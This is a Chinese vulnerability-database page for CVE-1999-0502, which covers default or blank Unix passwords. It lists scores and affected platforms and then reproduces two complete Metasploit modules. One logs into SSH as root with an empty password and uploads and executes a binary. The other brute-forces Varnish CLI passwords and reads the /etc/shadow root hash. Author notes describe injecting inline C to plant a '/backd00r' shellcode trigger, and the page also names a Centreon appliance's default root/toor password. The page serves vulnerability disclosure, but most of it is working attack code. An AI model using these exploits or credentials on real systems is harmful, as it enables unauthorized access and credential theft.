CVE-1999-0502
CVSS7.5
发布时间 :1998-03-01 00:00:00
修订时间 :2008-09-09 08:34:39
NMCOP    

[原文]A Unix account has a default, null, blank, or missing password.


[CNNVD]Unix账户漏洞(CNNVD-199803-001)

        Unix账户存在默认、空、空白或丢失密码漏洞。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.6
cpe:/o:hp:hp-ux:11HP-UX 11 family
cpe:/o:sun:solaris:7.0
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/o:redhat:linux:6.0Red Hat Linux 6.0
cpe:/o:sun:solaris:2.5.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0502
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0502
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199803-001
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

Unix账户漏洞
高危 未知
1998-03-01 00:00:00 2005-10-20 00:00:00
远程  
        Unix账户存在默认、空、空白或丢失密码漏洞。

- 公告与补丁

        

- 漏洞信息 (F121655)

SSH User Code Execution (PacketStormID:F121655)
2013-05-15 00:00:00
Spencer McIntyre  metasploit.com
exploit,shell
CVE-1999-0502
[点击下载]

This Metasploit module utilizes a stager to upload a base64 encoded binary which is then decoded, chmod'ed and executed from the command shell.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ManualRanking

	include Msf::Exploit::CmdStagerBourne

	attr_accessor :ssh_socket

	def initialize
		super(
			'Name'        => 'SSH User Code Execution',
			'Description' => %q{
				This module utilizes a stager to upload a base64 encoded
				binary which is then decoded, chmod'ed and executed from
				the command shell.
			},
			'Author'      => ['Spencer McIntyre', 'Brandon Knight'],
			'References'  =>
				[
					[ 'CVE', '1999-0502'] # Weak password
				],
			'License'     => MSF_LICENSE,
			'Privileged'  => true,
			'DefaultOptions' =>
				{
					'PrependFork' => 'true',
					'EXITFUNC' => 'process'
				},
			'Payload'     =>
				{
					'Space'    => 4096,
					'BadChars' => "",
					'DisableNops' => true
				},
			'Platform'    => [ 'osx', 'linux' ],
			'Targets'     =>
				[
					[ 'Linux x86',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'linux'
						},
					],
					[ 'Linux x64',
						{
							'Arch' => ARCH_X86_64,
							'Platform' => 'linux'
						},
					],
					[ 'OSX x86',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'osx'
						},
					],
				],
			'DefaultTarget'  => 0,
			# For the CVE
			'DisclosureDate' => 'Jan 01 1999'
		)

		register_options(
			[
				OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
				OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
				OptString.new('RHOST', [ true, "The target address" ]),
				Opt::RPORT(22)
			], self.class
		)

		register_advanced_options(
			[
				OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
			]
		)
	end

	def execute_command(cmd, opts = {})
		begin
			Timeout.timeout(3) do
				self.ssh_socket.exec!("#{cmd}\n")
			end
		rescue ::Exception
		end
	end

	def do_login(ip, user, pass, port)
		opt_hash = {
			:auth_methods  => ['password', 'keyboard-interactive'],
			:msframework   => framework,
			:msfmodule     => self,
			:port          => port,
			:disable_agent => true,
			:password      => pass
		}

		opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

		begin
			self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
		rescue Rex::ConnectionError, Rex::AddressInUse
			fail_with(Exploit::Failure::Unreachable, 'Disconnected during negotiation')
		rescue Net::SSH::Disconnect, ::EOFError
			fail_with(Exploit::Failure::Disconnected, 'Timed out during negotiation')
		rescue Net::SSH::AuthenticationFailed
			fail_with(Exploit::Failure::NoAccess, 'Failed authentication')
		rescue Net::SSH::Exception => e
			fail_with(Exploit::Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
		end

		if not self.ssh_socket
			fail_with(Exploit::Failure::Unknown)
		end
		return
	end

	def exploit
		do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])

		print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
		execute_cmdstager({:linemax => 500})
	end
end
    

- 漏洞信息 (F129674)

Varnish Cache CLI Interface Remote Code Execution (PacketStormID:F129674)
2014-12-20 00:00:00
Patrick Webster  metasploit.com
exploit,root
CVE-1999-0502,CVE-2009-2936,OSVDB-67670
[点击下载]

This Metasploit module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce list of passwords. This Metasploit module will also attempt to read the /etc/shadow root password hash if a valid password is found. It is possible to execute code as root with a valid password, however this is not yet implemented in this module.

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Auxiliary
 
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner
 
  def initialize
    super(
      'Name'           => 'Varnish Cache CLI Interface Bruteforce Utility',
      'Description'    => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce
                           list of passwords. This module will also attempt to read the /etc/shadow root password hash
                           if a valid password is found. It is possible to execute code as root with a valid password,
                           however this is not yet implemented in this module.',
      'References'     =>
        [
          [ 'OSVDB', '67670' ],
          [ 'CVE', '2009-2936' ],
          # General
          [ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ],
          [ 'CVE', '1999-0502'] # Weak password
        ],
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE
    )
 
    register_options(
      [
        Opt::RPORT(6082),
        OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
          File.join(Msf::Config.data_directory, "wordlists", "unix_passwords.txt") ]),
      ], self.class)
 
    deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS')
  end
 
  def run_host(ip)
        connect
        res = sock.get_once(-1,3) # detect banner
          if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
            vprint_status("Varnishd CLI detected - authentication required.")
            each_user_pass { |user, pass|
            sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail.
            res = sock.get_once(-1,3) # grab challenge
            if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
              challenge = $1
              secret = pass + "\n" # newline is needed
              response = challenge + "\n" + secret + challenge + "\n"
              response = Digest::SHA256.hexdigest(response)
              sock.put("auth #{response}\n")
              res = sock.get_once(-1,3)
              if (res =~ /107 \d+/) # 107 auth
                vprint_status("FAILED: #{secret}")
              elsif (res =~ /200 \d+/) # 200 ok
                print_good("GOOD: #{secret}")   
                 
                report_auth_info(
                  :host => rhost,
                  :port => rport,
                  :sname => ('varnishd'),
                  :pass => pass,
                  :proof => "#{res}",
                  :source_type => "user_supplied",
                  :active => true
                )
                               
                sock.put("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} /etc/shadow\n") # only returns 1 line of any target file.
                res = sock.get_once(-1,3)
                if (res =~ /root:([\D\S]+):/) # lazy.
                  if ($1[0] == "!")
                    vprint_error("/etc/shadow root uid is disabled.\n")
                  else
                    print_good("/etc/shadow root enabled:\nroot:#{$1}:")
                  end
                else
                  vprint_error("Unable to read /etc/shadow?:\n#{res}\n")
                end
                 
                break
              else
                vprint_error("Unknown response:\n#{res}\n")
              end
            end
            }
          elsif (res =~ /Varnish Cache CLI 1.0/)
            print_good("Varnishd CLI does not require authentication!")
          else
            vprint_error("Unknown response:\n#{res}\n")
          end
        disconnect
    end
end
 
=begin
 
aushack notes:
 
- varnishd typically runs as root, forked as unpriv.
- 'param.show' lists configurable options.
- 'cli_timeout' is 60 seconds. param.set cli_timeout 99999 (?) if we want to inject payload into a client thread and avoid being killed.
- 'user' is nobody. param.set user root (may have to stop/start the child to activate)
- 'group' is nogroup. param.set group root (may have to stop/start the child to activate)
- (unless varnishd is launched with -r user,group (read-only) implemented in v4, which may make priv esc fail).
- vcc_unsafe_path is on. used to 'import ../../../../file' etc.
- vcc_allow_inline_c is off. param.set vcc_allow_inline_c on to enable code execution.
- code execution notes:
 
* quotes must be escaped \"
* \n is a newline
* C{ }C denotes raw C code.
* e.g. C{ unsigned char shellcode[] = \"\xcc\"; }C
* #import <stdio.h> etc must be "newline", i.e. C{ \n#include <stdlib.h>\n dosomething(); }C (without 2x \n, include statement will not interpret correctly).
* C{ asm(\"int3\"); }C can be used for inline assembly / shellcode.
* varnishd has it's own 'vcl' syntax. can't seem to inject C randomly - must fit VCL logic.
* example trigger for backdoor:
 
VCL server:
  vcl.inline foo "vcl 4.0;\nbackend b { . host = \"127.0.0.1\";  } sub vcl_recv { if (req.url ~ \"^/backd00r\") { C{ asm(\"int3\"); }C } } \n"
  vcl.use foo
  start
 
Attacker:
  telnet target 80
  GET /backd00r HTTP/1.1
  Host: 127.0.0.1
 
(... wait for child to execute debug trap INT3 / shellcode).
 
CLI protocol notes from website:
 
The CLI protocol used on the management/telnet interface is a strict request/response protocol, there are no unsolicited transmissions from the responding end.
 
Requests are whitespace separated tokens terminated by a newline (NL) character.
 
Tokens can be quoted with "..." and common backslash escape forms are accepted: (\n), (\r), (\t), (
), (\"), (\%03o) and (\x%02x)
 
The response consists of a header which can be read as fixed format or ASCII text:
 
    1-3      %03d      Response code
    4        ' '       Space
    5-12     %8d       Length of body
    13       \n        NL character.
Followed by the number of bytes announced by the header.
 
The Responsecode is numeric shorthand for the nature of the reaction, with the following values currently defined in include/cli.h:
 
enum cli_status_e {
        CLIS_SYNTAX     = 100,
        CLIS_UNKNOWN    = 101,
        CLIS_UNIMPL     = 102,
        CLIS_TOOFEW     = 104,
        CLIS_TOOMANY    = 105,
        CLIS_PARAM      = 106,
        CLIS_OK         = 200,
        CLIS_CANT       = 300,
        CLIS_COMMS      = 400,
        CLIS_CLOSE      = 500
};
=end

    

- 漏洞信息

56382
Centreon Nagios Virtual Appliance Default Account
Remote / Network Access, Local / Remote Authentication Management
Loss of Integrity
Exploit Public

- 漏洞描述

By default, the Centrion Nagios Virtual Appliance installs with a default password. The 'root' account has a password of 'toor' which is publicly known and documented. This allows attackers to trivially access the program or system.

- 时间线

2007-08-08 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站